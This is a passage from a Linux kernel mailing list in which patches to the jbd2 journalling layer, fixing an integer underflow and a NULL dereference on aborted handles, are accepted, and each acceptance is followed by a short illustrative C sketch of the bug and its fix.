> The resulting underflow corrupts j_last, j_fc_first, and j_free,
> leading to journal abort.
> 
> [...]

Applied, thanks!

[1/1] jbd2: fix integer underflow in jbd2_journal_initialize_fast_commit()
      commit: 289a2ca0c9b7eae74f93fc213b0b971669b8683d

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>
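
A minimal userspace sketch of the wraparound described in the quoted
commit message.  TOY_MIN_JOURNAL_BLOCKS is a stand-in for
JBD2_MIN_JOURNAL_BLOCKS with an assumed value, the function names are
hypothetical, and the "safe" variant is just one way to write the
check, not necessarily the form the applied patch uses.

```c
#include <stdbool.h>

/* Assumed value, for illustration only. */
#define TOY_MIN_JOURNAL_BLOCKS 1024UL

/*
 * The check as quoted: with unsigned operands, last - num_fc_blks
 * wraps to a huge value when num_fc_blks > last, so the comparison
 * is false and the undersized journal is accepted.
 */
static bool toy_too_small_wrapping(unsigned long last,
				   unsigned long num_fc_blks)
{
	return last - num_fc_blks < TOY_MIN_JOURNAL_BLOCKS;
}

/* Reject the oversized request before subtracting. */
static bool toy_too_small_safe(unsigned long last,
			       unsigned long num_fc_blks)
{
	return num_fc_blks > last ||
	       last - num_fc_blks < TOY_MIN_JOURNAL_BLOCKS;
}
```

With last = 100 and num_fc_blks = 200, the wrapping variant reports
the journal as large enough, while the safe variant rejects it.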


* Re: [PATCH] jbd2: check for aborted handle in jbd2_journal_dirty_metadata()
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: jack, Deepanshu Kartikey
  Cc: Theodore Ts'o, linux-ext4, linux-kernel,
	syzbot+98f651460e558a21baae
In-Reply-To: <20260507050605.50081-1-kartikey406@gmail.com>


On Thu, 07 May 2026 10:36:05 +0530, Deepanshu Kartikey wrote:
> jbd2_journal_dirty_metadata() unconditionally dereferences
> handle->h_transaction at function entry to obtain the journal pointer:
> 
> 	transaction_t *transaction = handle->h_transaction;
> 	journal_t *journal = transaction->t_journal;
> 
> However, h_transaction may legitimately be NULL for an aborted handle.
> The is_handle_aborted() helper in include/linux/jbd2.h explicitly
> treats !h_transaction as one of the aborted states:
> 
> [...]

Applied, thanks!

[1/1] jbd2: check for aborted handle in jbd2_journal_dirty_metadata()
      commit: 8fc197cf366beaabaeb46575c8cf46fe5076b943

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>
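
A minimal userspace sketch of the pattern described in the quoted
commit message: check for an aborted handle before dereferencing
h_transaction.  The toy_* types and functions are hypothetical mock-ups
that borrow only the field names mentioned in the thread.  The -EROFS
return value and the h_aborted field are assumptions made for the
example, and the real is_handle_aborted() may check more than this.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>

struct toy_journal {
	int id;
};

struct toy_transaction {
	struct toy_journal *t_journal;
};

struct toy_handle {
	struct toy_transaction *h_transaction;	/* may be NULL if aborted */
	bool h_aborted;				/* assumed field */
};

/* A NULL h_transaction counts as one of the aborted states. */
static bool toy_handle_aborted(const struct toy_handle *handle)
{
	return handle->h_aborted || handle->h_transaction == NULL;
}

/* Look up the journal only after the aborted check has passed. */
static int toy_dirty_metadata(const struct toy_handle *handle,
			      struct toy_journal **journal)
{
	if (toy_handle_aborted(handle))
		return -EROFS;	/* assumed error code */

	*journal = handle->h_transaction->t_journal;
	return 0;
}
```

The point of the ordering is that the dereference of h_transaction is
reached only on the path where it is known to be non-NULL.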


